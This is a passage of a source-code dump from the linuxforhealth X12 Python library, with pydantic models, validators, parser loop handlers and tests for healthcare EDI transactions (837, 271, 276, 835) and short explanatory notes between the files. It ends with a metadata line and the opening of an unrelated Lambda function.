Loop 2000A - Billing / Pay to Provider
"""
hl_segment: Loop2000AHlSegment
prv_segment: Optional[Loop2000APrvSegment]
cur_segment: Optional[CurSegment]
loop_2010aa: Loop2010Aa
loop_2010ab: Optional[Loop2010Ab]
loop_2000b: List[Loop2000B]
class Header(X12SegmentGroup):
"""
Transaction Header Information
"""
st_segment: HeaderStSegment
bht_segment: HeaderBhtSegment
ref_segment: HeaderRefSegment
class Footer(X12SegmentGroup):
"""
Transaction Footer Information
"""
se_segment: SeSegment
```
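The `Loop2300.validate_claim_amounts` validator above enforces the 837 balancing rule that the claim charge amount (CLM02) must equal the sum of the service line charges (SV102). The snippet below is a minimal, self-contained sketch of that same pydantic v1 `root_validator` pattern using hypothetical `Claim`/`ServiceLine` models, not the library's classes:

```python
from decimal import Decimal
from typing import List

from pydantic import BaseModel, root_validator


class ServiceLine(BaseModel):
    # stands in for Loop2400.sv1_segment.line_item_charge_amount (SV102)
    line_item_charge_amount: Decimal


class Claim(BaseModel):
    # stands in for ClmSegment.total_claim_charge_amount (CLM02)
    total_claim_charge_amount: Decimal
    service_lines: List[ServiceLine]

    @root_validator
    def validate_claim_amounts(cls, values):
        """Reject the claim when CLM02 does not equal the sum of the SV102 charges."""
        claim_amount = values.get("total_claim_charge_amount", Decimal("0"))
        line_total = sum(
            (line.line_item_charge_amount for line in values.get("service_lines", [])),
            Decimal("0"),
        )
        if claim_amount != line_total:
            raise ValueError(f"Claim Amount {claim_amount} != Service Line Total {line_total}")
        return values


# Balances: 100.00 == 60.00 + 40.00, so validation passes.
Claim(
    total_claim_charge_amount=Decimal("100.00"),
    service_lines=[
        ServiceLine(line_item_charge_amount=Decimal("60.00")),
        ServiceLine(line_item_charge_amount=Decimal("40.00")),
    ],
)
```

Raising `ValueError` inside a root validator surfaces as a pydantic `ValidationError` on the whole model, which is how the transaction models above report balancing failures.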
#### File: v5010/x12_271_005010X279A1/loops.py
```python
from linuxforhealth.x12.models import X12SegmentGroup
from linuxforhealth.x12.v5010.segments import (
SeSegment,
N3Segment,
N4Segment,
TrnSegment,
DmgSegment,
HiSegment,
MpiSegment,
EbSegment,
HsdSegment,
MsgSegment,
IiiSegment,
LsSegment,
LeSegment,
PerSegment,
PrvSegment,
)
from .segments import (
HeaderStSegment,
HeaderBhtSegment,
Loop2000CHlSegment,
Loop2100BNm1Segment,
Loop2000BHlSegment,
Loop2100BRefSegment,
Loop2100BPrvSegment,
Loop2100ANm1Segment,
Loop2000AHlSegment,
Loop2000AAaaSegment,
Loop2100CNm1Segment,
Loop2100DNm1Segment,
Loop2100RefSegment,
Loop2100CInsSegment,
Loop2100DInsSegment,
Loop2100DtpSegment,
Loop2110RefSegment,
Loop2110DtpSegment,
Loop2100AAaaSegment,
Loop2100BAaaSegment,
Loop2110CAaaSegment,
Loop2120Nm1Segment,
Loop2000DHlSegment,
)
from typing import List, Optional
from pydantic import Field, root_validator
from linuxforhealth.x12.validators import validate_duplicate_ref_codes
class Header(X12SegmentGroup):
"""
Transaction Header Information
"""
st_segment: HeaderStSegment
bht_segment: HeaderBhtSegment
class Loop2120D(X12SegmentGroup):
"""
Loop 2120D
"""
nm1_segment: Loop2120Nm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
per_segment: Optional[List[PerSegment]] = Field(min_items=0, max_items=3)
prv_segment: Optional[PrvSegment]
class Loop2115D(X12SegmentGroup):
"""
Loop 2115D - Dependent Eligibility or Benefit Additional Information
"""
iii_segment: IiiSegment
ls_segment: LsSegment
loop_2120c: Optional[List[Loop2120D]] = Field(min_items=0, max_items=23)
le_segment: LeSegment
class Loop2110D(X12SegmentGroup):
"""
Loop 2110D Dependent Eligibility or Benefit Information
"""
eb_segment: EbSegment
hsd_segment: Optional[List[HsdSegment]] = Field(min_items=0, max_items=9)
ref_segment: Optional[List[Loop2110RefSegment]] = Field(min_items=0, max_items=9)
dtp_segment: Optional[List[Loop2110DtpSegment]] = Field(min_items=0, max_items=20)
aaa_segment: Optional[List[Loop2110CAaaSegment]] = Field(min_items=0, max_items=9)
msg_segment: Optional[List[MsgSegment]] = Field(min_items=0, max_items=10)
loop_2115d: Optional[List[Loop2115D]] = Field(min_items=0, max_items=10)
ls_segment: Optional[LsSegment]
loop_2120d: Optional[List[Loop2120D]] = Field(min_items=0, max_items=23)
le_segment: Optional[LeSegment]
_validate_ref_segments = root_validator(allow_reuse=True)(
validate_duplicate_ref_codes
)
class Loop2100D(X12SegmentGroup):
"""
Loop 2100D - Dependent Name
"""
nm1_segment: Loop2100DNm1Segment
ref_segment: Optional[List[Loop2100RefSegment]] = Field(min_items=0, max_items=9)
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
# Loop2100D AAA is identical to Loop2100B AAA
aaa_segment: Optional[List[Loop2100BAaaSegment]] = Field(min_items=0, max_items=9)
prv_segment: Optional[PrvSegment]
dmg_segment: Optional[DmgSegment]
ins_segment: Optional[Loop2100DInsSegment]
hi_segment: Optional[HiSegment]
dtp_segment: Optional[List[Loop2100DtpSegment]] = Field(min_items=0, max_items=9)
mpi_segment: Optional[MpiSegment]
loop_2110d: Optional[List[Loop2110D]] = Field(min_items=0)
_validate_ref_segments = root_validator(allow_reuse=True)(
validate_duplicate_ref_codes
)
class Loop2000D(X12SegmentGroup):
"""
Loop 2000D - Dependent
"""
hl_segment: Loop2000DHlSegment
trn_segment: Optional[List[TrnSegment]] = Field(min_items=0, max_items=2)
loop_2100d: Loop2100D
class Loop2120C(X12SegmentGroup):
"""
Loop 2120C Subscriber Benefit Related Entity Name
"""
nm1_segment: Loop2120Nm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
per_segment: Optional[List[PerSegment]] = Field(min_items=0, max_items=3)
prv_segment: Optional[PrvSegment]
class Loop2115C(X12SegmentGroup):
"""
Loop 2115C - Subscriber Eligibility or Benefit Information Additional Information
"""
iii_segment: IiiSegment
ls_segment: LsSegment
loop_2120c: Optional[List[Loop2120C]] = Field(min_items=0, max_items=23)
le_segment: LeSegment
class Loop2110C(X12SegmentGroup):
"""
Loop2110C - Subscriber Eligibility or Benefit Information
"""
eb_segment: EbSegment
hsd_segment: Optional[List[HsdSegment]] = Field(min_items=0, max_items=9)
ref_segment: Optional[List[Loop2110RefSegment]] = Field(min_items=0, max_items=9)
dtp_segment: Optional[List[Loop2110DtpSegment]] = Field(min_items=0, max_items=20)
aaa_segment: Optional[List[Loop2110CAaaSegment]] = Field(min_items=0, max_items=9)
msg_segment: Optional[List[MsgSegment]] = Field(min_items=0, max_items=10)
loop_2115c: Optional[List[Loop2115C]] = Field(min_items=0, max_items=10)
ls_segment: Optional[LsSegment]
loop_2120c: Optional[List[Loop2120C]] = Field(min_items=0, max_items=23)
le_segment: Optional[LeSegment]
_validate_ref_segments = root_validator(allow_reuse=True)(
validate_duplicate_ref_codes
)
@root_validator
def validate_red_cross_eb_ref_codes(cls, values):
"""
Validates that reference identification codes are limited when American Red Cross is the eligibility benefit.
        :param values: The validated model values
"""
benefit_code = values["eb_segment"].eligibility_benefit_information
arc_ref_types = {"1W", "49", "F6", "NQ"}
        ref_types = {
            r.reference_identification_qualifier
            for r in (values.get("ref_segment") or [])
        }
if ref_types and benefit_code == "R" and (ref_types - arc_ref_types):
raise ValueError(f"{ref_types} are not valid for American Red Cross")
return values
class Loop2100C(X12SegmentGroup):
"""
Loop 2100C - Subscriber Name
"""
nm1_segment: Loop2100CNm1Segment
ref_segment: Optional[List[Loop2100RefSegment]] = Field(min_items=0, max_items=9)
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
# Loop2100C AAA is identical to Loop2100B AAA
aaa_segment: Optional[List[Loop2100BAaaSegment]] = Field(min_items=0, max_items=9)
prv_segment: Optional[PrvSegment]
dmg_segment: Optional[DmgSegment]
ins_segment: Optional[Loop2100CInsSegment]
hi_segment: Optional[HiSegment]
dtp_segment: Optional[List[Loop2100DtpSegment]] = Field(min_items=0, max_items=9)
mpi_segment: Optional[MpiSegment]
loop_2110c: Optional[List[Loop2110C]] = Field(min_items=0)
_validate_ref_segments = root_validator(allow_reuse=True)(
validate_duplicate_ref_codes
)
class Loop2000C(X12SegmentGroup):
"""
Loop 2000C - Subscriber
"""
hl_segment: Loop2000CHlSegment
trn_segment: Optional[List[TrnSegment]] = Field(min_items=0, max_items=2)
loop_2100c: Loop2100C
loop_2000d: Optional[List[Loop2000D]] = Field(min_items=0)
class Loop2100B(X12SegmentGroup):
"""
Loop 2100B - Information Receiver Name
"""
nm1_segment: Loop2100BNm1Segment
ref_segment: Optional[List[Loop2100BRefSegment]]
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
aaa_segment: Optional[List[Loop2100BAaaSegment]]
prv_segment: Optional[Loop2100BPrvSegment]
_validate_ref_segments = root_validator(allow_reuse=True)(
validate_duplicate_ref_codes
)
class Loop2000B(X12SegmentGroup):
"""
Loop 2000B - Information Receiver
"""
hl_segment: Loop2000BHlSegment
loop_2100b: Loop2100B
loop_2000c: Optional[List[Loop2000C]]
class Loop2100A(X12SegmentGroup):
"""
Loop 2100A - Information Source Name
"""
nm1_segment: Loop2100ANm1Segment
prv_segment: Optional[List[PrvSegment]] = Field(min_items=0, max_items=3)
aaa_segment: Optional[List[Loop2100AAaaSegment]] = Field(min_items=0, max_items=9)
class Loop2000A(X12SegmentGroup):
"""
Loop 2000A - Information Source
The root node/loop for the 271 transaction
"""
hl_segment: Loop2000AHlSegment
aaa_segment: Optional[List[Loop2000AAaaSegment]] = Field(min_items=0, max_items=9)
loop_2100a: Loop2100A
loop_2000b: List[Loop2000B] = Field(min_items=0)
class Footer(X12SegmentGroup):
"""
Transaction Footer Information
"""
se_segment: SeSegment
```
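Several loops above attach the same shared check with `root_validator(allow_reuse=True)(validate_duplicate_ref_codes)`. The real validator lives in `linuxforhealth.x12.validators` and is not shown here; the sketch below (a hypothetical `RefSegment` model, two stand-in loops, and a stand-in check) only illustrates how `allow_reuse=True` lets one function back validators on multiple pydantic models:

```python
from typing import List, Optional

from pydantic import BaseModel, root_validator


def no_duplicate_codes(cls, values):
    """Stand-in for validate_duplicate_ref_codes: reject repeated qualifier codes (sketch only)."""
    codes = [r.code for r in (values.get("ref_segment") or [])]
    if len(codes) != len(set(codes)):
        raise ValueError(f"duplicate reference codes: {codes}")
    return values


class RefSegment(BaseModel):
    code: str


class LoopA(BaseModel):
    ref_segment: Optional[List[RefSegment]]
    # allow_reuse=True lets the same function be registered on several models
    _validate_ref_segments = root_validator(allow_reuse=True)(no_duplicate_codes)


class LoopB(BaseModel):
    ref_segment: Optional[List[RefSegment]]
    _validate_ref_segments = root_validator(allow_reuse=True)(no_duplicate_codes)


LoopA(ref_segment=[RefSegment(code="1W"), RefSegment(code="49")])  # distinct codes: passes
```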
#### File: v5010/x12_271_005010X279A1/transaction_set.py
```python
from typing import List, Dict, Tuple
from linuxforhealth.x12.models import X12SegmentGroup
from .loops import Footer, Header, Loop2000A
from pydantic import root_validator
from linuxforhealth.x12.validators import validate_segment_count
class EligibilityBenefit(X12SegmentGroup):
"""
The ASC X12 271 (EligibilityBenefit) transaction model.
"""
header: Header
loop_2000a: List[Loop2000A]
footer: Footer
_validate_segment_count = root_validator(allow_reuse=True)(validate_segment_count)
@root_validator
def validate_subscriber_name(cls, values):
"""
        Validates that the subscriber name is present if the subscriber is a patient
:param values: The raw, unvalidated transaction data.
"""
for info_source in values.get("loop_2000a", []):
for info_receiver in info_source.loop_2000b:
info_receivers = info_receiver.loop_2000c or []
for subscriber in info_receivers:
child_code = subscriber.hl_segment.hierarchical_child_code
first_name = subscriber.loop_2100c.nm1_segment.name_first
if child_code == "0" and not first_name:
raise ValueError(
f"name_first is required when the subscriber is the patient"
)
return values
@root_validator
def validate_subscriber_hierarchy_child_code(cls, values):
"""
Validates that a subscriber's hierarchy child code is set correctly based on the presence of a dependent loop.
:param values: The raw, unvalidated transaction data.
"""
for info_source in values.get("loop_2000a", []):
for info_receiver in info_source.loop_2000b:
info_receivers = info_receiver.loop_2000c or []
for subscriber in info_receivers:
child_code = subscriber.hl_segment.hierarchical_child_code
if child_code == "1" and not subscriber.loop_2000d:
raise ValueError(
f"Invalid subscriber hierarchy code {child_code} no dependent record is present"
)
return values
@root_validator
def validate_hierarchy_ids(cls, values):
"""
        Validates the HL segment linkage across the entire EligibilityBenefit transaction.
Validations are limited to checks that are not covered within a segment or field scope.
:param values: The raw, unvalidated transaction data.
"""
def get_ids(hl_segment: Dict) -> Tuple[int, int]:
"""returns tuple of (id, parent_id)"""
id = hl_segment.hierarchical_id_number
parent_id = hl_segment.hierarchical_parent_id_number
return int(id) if id else 0, int(parent_id) if parent_id else 0
for info_source in values.get("loop_2000a", []):
# info source does not have a parent id, since it starts a new hierarchy - this is validated at the
# segment level
source_id, _ = get_ids(info_source.hl_segment)
previous_id: int = source_id
for info_receiver in info_source.loop_2000b:
receiver_id, receiver_parent_id = get_ids(info_receiver.hl_segment)
if receiver_parent_id != previous_id:
raise ValueError(f"Invalid receiver parent id {receiver_parent_id}")
if receiver_parent_id != source_id:
raise ValueError(
f"receiver parent id {receiver_parent_id} != source id {source_id}"
)
previous_id = receiver_id
info_receivers = info_receiver.loop_2000c or []
for subscriber in info_receivers:
subscriber_id, subscriber_parent_id = get_ids(subscriber.hl_segment)
if subscriber_parent_id != previous_id:
raise ValueError(
f"Invalid subscriber parent id {subscriber_parent_id}"
)
if subscriber_parent_id != receiver_id:
raise ValueError(
f"subscriber parent id {subscriber_parent_id} != receiver id {receiver_id}"
)
previous_id = subscriber_id
if not subscriber.loop_2000d:
continue
for dependent in subscriber.loop_2000d:
dependent_id, dependent_parent_id = get_ids(
dependent.hl_segment
)
if dependent_parent_id != previous_id:
raise ValueError(
f"Invalid dependent parent id {dependent_parent_id}"
)
if dependent_parent_id != subscriber_id:
raise ValueError(
f"dependent parent id {dependent_parent_id} != subscriber id {subscriber_id}"
)
previous_id = dependent_id
return values
```
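`validate_hierarchy_ids` walks the HL chain so that each level's parent id points at the id seen immediately above it (information source → receiver → subscriber → dependent). The illustration below uses the standard HL element positions (HL01 id, HL02 parent id, HL03 level code, HL04 child code) with example values; it is not library code:

```python
# Illustrative only: a 271 HL chain that the validator above accepts.
# HL01 = hierarchical id, HL02 = parent id, HL03 = level code, HL04 = child code.
hl_chain = [
    "HL*1**20*1~",   # information source (starts the hierarchy, no parent)
    "HL*2*1*21*1~",  # information receiver -> parent is the source (1)
    "HL*3*2*22*1~",  # subscriber -> parent is the receiver (2)
    "HL*4*3*23*0~",  # dependent -> parent is the subscriber (3)
]


def check_chain(segments):
    """Mirror the parent-id walk performed by validate_hierarchy_ids (sketch)."""
    previous_id = 0
    for segment in segments:
        _, hl_id, parent_id, *_ = segment.rstrip("~").split("*")
        if parent_id and int(parent_id) != previous_id:
            raise ValueError(f"HL {hl_id} points at parent {parent_id}, expected {previous_id}")
        previous_id = int(hl_id)


check_chain(hl_chain)  # no exception: each level links to the id directly above it
```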
#### File: v5010/x12_276_005010X212/parsing.py
```python
from enum import Enum
from linuxforhealth.x12.parsing import X12ParserContext, match
from typing import Dict, Optional
class TransactionLoops(str, Enum):
"""
The loops used to support the 276 005010X212 format.
"""
HEADER = "header"
INFORMATION_SOURCE_LEVEL = "loop_2000a"
PAYER_NAME = "loop_2100a"
INFORMATION_RECEIVER_LEVEL = "loop_2000b"
INFORMATION_RECEIVER_NAME = "loop_2100b"
SERVICE_PROVIDER_LEVEL = "loop_2000c"
SERVICE_PROVIDER_NAME = "loop_2100c"
SUBSCRIBER_LEVEL = "loop_2000d"
SUBSCRIBER_NAME = "loop_2100d"
SUBSCRIBER_CLAIM_STATUS_TRACKING_NUMBER = "loop_2200d"
SUBSCRIBER_SERVICE_LINE_INFORMATION = "loop_2210d"
DEPENDENT_LEVEL = "loop_2000e"
DEPENDENT_NAME = "loop_2100e"
DEPENDENT_CLAIM_STATUS_TRACKING_NUMBER = "loop_2200e"
DEPENDENT_SERVICE_LINE_INFORMATION = "loop_2210e"
FOOTER = "footer"
def _get_information_source(context: X12ParserContext) -> Optional[Dict]:
return context.transaction_data[TransactionLoops.INFORMATION_SOURCE_LEVEL][-1]
def _get_information_receiver(context: X12ParserContext) -> Dict:
"""Returns the current information receiver record"""
information_source = _get_information_source(context)
return information_source[TransactionLoops.INFORMATION_RECEIVER_LEVEL][-1]
def _get_service_provider(
context: X12ParserContext, hierarchical_id: str
) -> Optional[Dict]:
"""
Returns the service provider record by id.
:param hierarchical_id: The service provider hierarchical level id
"""
information_receiver = _get_information_receiver(context)
for sp in information_receiver.get(TransactionLoops.SERVICE_PROVIDER_LEVEL, []):
sp_hierarchical_id = sp.get("hl_segment", {}).get("hierarchical_id_number")
if sp_hierarchical_id == hierarchical_id:
return sp
return None
def _is_subscriber(patient_record: Dict):
"""Returns true if the patient is a subscriber record"""
return patient_record.get("hl_segment", {}).get("hierarchical_level_code") == "22"
@match("ST")
def set_header_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the transaction set header loop for the 276 transaction set.
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
context.set_loop_context(
TransactionLoops.HEADER, context.transaction_data[TransactionLoops.HEADER]
)
@match("HL", {"hierarchical_level_code": "20"})
def set_information_source_loop(context: X12ParserContext, segment_data: Dict):
"""
Sets the information source loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if TransactionLoops.INFORMATION_SOURCE_LEVEL not in context.transaction_data:
context.transaction_data[TransactionLoops.INFORMATION_SOURCE_LEVEL] = []
context.transaction_data[TransactionLoops.INFORMATION_SOURCE_LEVEL].append({})
loop_record = context.transaction_data[TransactionLoops.INFORMATION_SOURCE_LEVEL][
-1
]
context.set_loop_context(TransactionLoops.INFORMATION_SOURCE_LEVEL, loop_record)
@match("NM1", {"entity_identifier_code": "PR"})
def set_payer_name_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the Information Source/Payer Name Loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if context.loop_name == TransactionLoops.INFORMATION_SOURCE_LEVEL:
information_source = _get_information_source(context)
information_source[TransactionLoops.PAYER_NAME] = {}
loop_record = information_source[TransactionLoops.PAYER_NAME]
context.set_loop_context(TransactionLoops.PAYER_NAME, loop_record)
@match("HL", {"hierarchical_level_code": "21"})
def set_information_receiver_loop(
context: X12ParserContext, segment_data: Dict
) -> None:
"""
Sets the information receiver loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
information_source = _get_information_source(context)
if TransactionLoops.INFORMATION_RECEIVER_LEVEL not in information_source:
information_source[TransactionLoops.INFORMATION_RECEIVER_LEVEL] = []
information_source[TransactionLoops.INFORMATION_RECEIVER_LEVEL].append({})
loop_record = information_source[TransactionLoops.INFORMATION_RECEIVER_LEVEL][-1]
context.set_loop_context(TransactionLoops.INFORMATION_RECEIVER_LEVEL, loop_record)
@match("NM1", {"entity_identifier_code": "41"})
def set_information_receiver_name_loop(
context: X12ParserContext, segment_data: Dict
) -> None:
"""
Sets the Information Receiver Name Loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if context.loop_name == TransactionLoops.INFORMATION_RECEIVER_LEVEL:
information_receiver = _get_information_receiver(context)
information_receiver[TransactionLoops.INFORMATION_RECEIVER_NAME] = {}
loop_record = information_receiver[TransactionLoops.INFORMATION_RECEIVER_NAME]
context.set_loop_context(
TransactionLoops.INFORMATION_RECEIVER_NAME, loop_record
)
@match("HL", {"hierarchical_level_code": "19"})
def set_service_provider_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the service provider loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
information_receiver = _get_information_receiver(context)
if TransactionLoops.SERVICE_PROVIDER_LEVEL not in information_receiver:
information_receiver[TransactionLoops.SERVICE_PROVIDER_LEVEL] = []
information_receiver[TransactionLoops.SERVICE_PROVIDER_LEVEL].append({})
loop_record = information_receiver[TransactionLoops.SERVICE_PROVIDER_LEVEL][-1]
context.set_loop_context(TransactionLoops.SERVICE_PROVIDER_LEVEL, loop_record)
@match("NM1", {"entity_identifier_code": "1P"})
def set_service_provider_name_loop(
context: X12ParserContext, segment_data: Dict
) -> None:
"""
Sets the Service Provider Name Loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if context.loop_name == TransactionLoops.SERVICE_PROVIDER_LEVEL:
context.loop_container[TransactionLoops.SERVICE_PROVIDER_NAME] = {}
loop_record = context.loop_container[TransactionLoops.SERVICE_PROVIDER_NAME]
context.set_loop_context(TransactionLoops.SERVICE_PROVIDER_NAME, loop_record)
@match("HL", {"hierarchical_level_code": "22"})
def set_subscriber_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the subscriber loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
service_provider_id = segment_data.get("hierarchical_parent_id_number")
service_provider = _get_service_provider(context, service_provider_id)
if service_provider is None:
raise LookupError(f"Service Provider ID {service_provider_id} not found")
if TransactionLoops.SUBSCRIBER_LEVEL not in service_provider:
service_provider[TransactionLoops.SUBSCRIBER_LEVEL] = []
service_provider[TransactionLoops.SUBSCRIBER_LEVEL].append({})
context.subscriber_record = service_provider[TransactionLoops.SUBSCRIBER_LEVEL][-1]
context.set_loop_context(
TransactionLoops.SUBSCRIBER_LEVEL, context.subscriber_record
)
# subscriber is patient
if segment_data.get("hierarchical_child_code", "0") == "0":
context.patient_record = context.subscriber_record
@match("NM1", {"entity_identifier_code": "IL"})
def set_subscriber_name_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the Subscriber Name Loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if context.loop_name == TransactionLoops.SUBSCRIBER_LEVEL:
context.subscriber_record[TransactionLoops.SUBSCRIBER_NAME] = {}
loop_record = context.subscriber_record[TransactionLoops.SUBSCRIBER_NAME]
context.set_loop_context(TransactionLoops.SUBSCRIBER_NAME, loop_record)
@match("TRN")
def set_claim_status_tracking_loop(
context: X12ParserContext, segment_data: Dict
) -> None:
"""
Sets the claim status tracking loop for the patient (subscriber or dependent)
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if _is_subscriber(context.patient_record):
loop_name = TransactionLoops.SUBSCRIBER_CLAIM_STATUS_TRACKING_NUMBER
else:
loop_name = TransactionLoops.DEPENDENT_CLAIM_STATUS_TRACKING_NUMBER
if loop_name not in context.patient_record:
context.patient_record[loop_name] = []
context.patient_record[loop_name].append({"ref_segment": []})
loop_record = context.patient_record[loop_name][-1]
context.set_loop_context(loop_name, loop_record)
@match("SVC")
def set_service_line_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the service line loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
claim_status = context.loop_container
if _is_subscriber(context.patient_record):
loop_name = TransactionLoops.SUBSCRIBER_SERVICE_LINE_INFORMATION
else:
loop_name = TransactionLoops.DEPENDENT_SERVICE_LINE_INFORMATION
if loop_name not in claim_status:
claim_status[loop_name] = []
claim_status[loop_name].append({})
loop_record = claim_status[loop_name][-1]
context.set_loop_context(loop_name, loop_record)
@match("HL", {"hierarchical_level_code": "23"})
def set_dependent_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the dependent loop
"""
if TransactionLoops.DEPENDENT_LEVEL not in context.subscriber_record:
context.subscriber_record[TransactionLoops.DEPENDENT_LEVEL] = []
context.subscriber_record[TransactionLoops.DEPENDENT_LEVEL].append({})
context.patient_record = context.subscriber_record[
TransactionLoops.DEPENDENT_LEVEL
][-1]
context.set_loop_context(TransactionLoops.DEPENDENT_LEVEL, context.patient_record)
@match("NM1", {"entity_identifier_code": "QC"})
def set_dependent_name_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the Dependent Name Loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if context.loop_name == TransactionLoops.DEPENDENT_LEVEL:
context.patient_record[TransactionLoops.DEPENDENT_NAME] = {}
loop_record = context.patient_record[TransactionLoops.DEPENDENT_NAME]
context.set_loop_context(TransactionLoops.DEPENDENT_NAME, loop_record)
@match("SE")
def set_footer_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the transaction set footer loop.
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
context.set_loop_context(
TransactionLoops.FOOTER, context.transaction_data["footer"]
)
```
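Each handler above is registered with `@match`, keyed on a segment name plus optional field values, so the parser can route a segment such as an `HL` with level code `21` to `set_information_receiver_loop`. The actual decorator is defined in `linuxforhealth.x12.parsing` and is not shown here; the following is only a sketch of that dispatch idea with a hypothetical registry and a simplified handler signature:

```python
from typing import Callable, Dict, List, Optional, Tuple

# A guess at the registry's shape, not the library's actual data structure:
# (segment name, required field values, handler function).
_HANDLERS: List[Tuple[str, Dict, Callable]] = []


def match(segment_name: str, conditions: Optional[Dict] = None):
    """Register a loop-entry handler for a segment (sketch of the idea only)."""
    def decorator(func: Callable) -> Callable:
        _HANDLERS.append((segment_name, conditions or {}, func))
        return func
    return decorator


def dispatch(segment_name: str, segment_data: Dict) -> None:
    """Invoke every handler whose segment name and field conditions match the segment."""
    for name, conditions, handler in _HANDLERS:
        if name == segment_name and all(segment_data.get(k) == v for k, v in conditions.items()):
            handler(segment_data)


@match("HL", {"hierarchical_level_code": "21"})
def on_information_receiver(segment_data: Dict) -> None:
    # the real handlers also receive an X12ParserContext; omitted here for brevity
    print("entering loop_2000b for HL", segment_data["hierarchical_id_number"])


dispatch("HL", {"hierarchical_level_code": "21", "hierarchical_id_number": "2"})
```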
#### File: tests/healthcare_claim_payment/test_835_005010X221A1.py
```python
import pytest
from tests.support import assert_eq_model, resources_directory
import os
@pytest.fixture
def resource_path() -> str:
return os.path.join(resources_directory, "835_005010X221A1")
@pytest.mark.parametrize(
"file_name",
[
"medicare-part-a.835",
"managed-care.835",
"secondary-payment.835",
"tertiary-payment.835",
"cob-contractural-adjustment.835",
],
)
def test_835_model(resource_path, file_name: str):
x12_file_path = os.path.join(resource_path, file_name)
assert os.path.exists(x12_file_path)
assert_eq_model(x12_file_path)
```
#### File: src/tests/test_common_validations.py
```python
from linuxforhealth.x12.io import X12ModelReader
import pytest
def test_segment_footer_count(simple_270_with_new_lines):
"""Validates the total segment count validation raises an exception"""
test_input = simple_270_with_new_lines.replace("SE*17*0001~", "SE*27*0001~")
with pytest.raises(ValueError):
with X12ModelReader(test_input) as r:
for _ in r.models():
pass
```
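This test exercises the reader's public contract: construct `X12ModelReader` from raw X12 text, iterate `models()`, and expect a `ValueError` when a transaction-level validation (here the SE segment count) fails. A minimal usage sketch, assuming `x12_text` holds a complete transaction such as the `simple_270_with_new_lines` fixture used above:

```python
from linuxforhealth.x12.io import X12ModelReader


def summarize(x12_text: str) -> None:
    """Parse a transaction and print the top-level groups of each model."""
    with X12ModelReader(x12_text) as reader:
        for model in reader.models():
            # model.dict() is the same structure the support tests count segments over
            print(sorted(model.dict().keys()))
```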
#### File: src/tests/test_support.py
```python
import pytest
import datetime
from linuxforhealth.x12.support import (
is_x12_data,
is_x12_file,
parse_x12_date,
parse_interchange_date,
count_segments,
parse_x12_major_version,
get_latest_implementation_version,
)
from linuxforhealth.x12.io import X12ModelReader
@pytest.mark.parametrize(
"test_input, is_fixture, expected",
[
("simple_270_with_new_lines", True, True),
("simple_270_one_line", True, True),
("foo", False, False),
("", False, False),
(None, False, False),
],
)
def test_is_x12_data(request, test_input: str, is_fixture: bool, expected: bool):
"""
Tests is_x12_data with fixtures and literal values.
:param request: The pytest request fixture. Used to lookup fixture values by name.
:param test_input: The fixture name or the literal value.
:param is_fixture: Indicates if test_input is a fixture name.
:param expected: The expected test value
"""
input_value = request.getfixturevalue(test_input) if is_fixture else test_input
assert is_x12_data(input_value) is expected
@pytest.mark.parametrize(
"test_input", ["simple_270_with_new_lines", "simple_270_one_line"]
)
def test_is_x12_file_true(request, tmpdir, test_input: str):
"""
Tests is_x12_file where the expected result is True.
:param request: The pytest request fixture. Used to lookup fixture values by name.
:param tmpdir: The pytest tmpdir fixture. Used to create tmp directory and files.
:param test_input: The fixture name.
"""
input_value = request.getfixturevalue(test_input)
f = tmpdir.mkdir("x12-support").join("test.x12")
f.write(input_value)
assert is_x12_file(f)
def test_is_x12_file_false():
assert is_x12_file("/home/not-a-real/file.txt") is False
assert is_x12_file("") is False
assert is_x12_file(None) is False
def test_parser_interchange_date():
assert parse_interchange_date("131031") == datetime.date(2013, 10, 31)
def test_parse_x12_date():
assert parse_x12_date("20120501") == datetime.date(2012, 5, 1)
assert parse_x12_date("201205011010") == datetime.datetime(2012, 5, 1, 10, 10)
assert parse_x12_date("") is None
assert parse_x12_date(None) is None
def test_count_segments(simple_270_with_new_lines):
with X12ModelReader(simple_270_with_new_lines) as r:
model = [m for m in r.models()][0]
model_data = model.dict()
segment_count: int = count_segments(model_data)
assert segment_count == 17
def test_parse_x12_major_version():
assert parse_x12_major_version("005010X279A1") == "5010"
assert parse_x12_major_version("00501") == ""
assert parse_x12_major_version(None) == ""
def test_get_latest_implementation_version():
assert get_latest_implementation_version("005010X222") == "005010X222A2"
assert get_latest_implementation_version("005010X222A1") == "005010X222A2"
assert get_latest_implementation_version("005010X222A2") == "005010X222A2"
with pytest.raises(KeyError):
get_latest_implementation_version("invalid-version")
``` |
{
"source": "Joe-Wu-88/my-test-repository",
"score": 2
} |
#### File: build/ModifyRequestHeaderFunction/app.py
```python
import os
def lambda_handler(event, context):
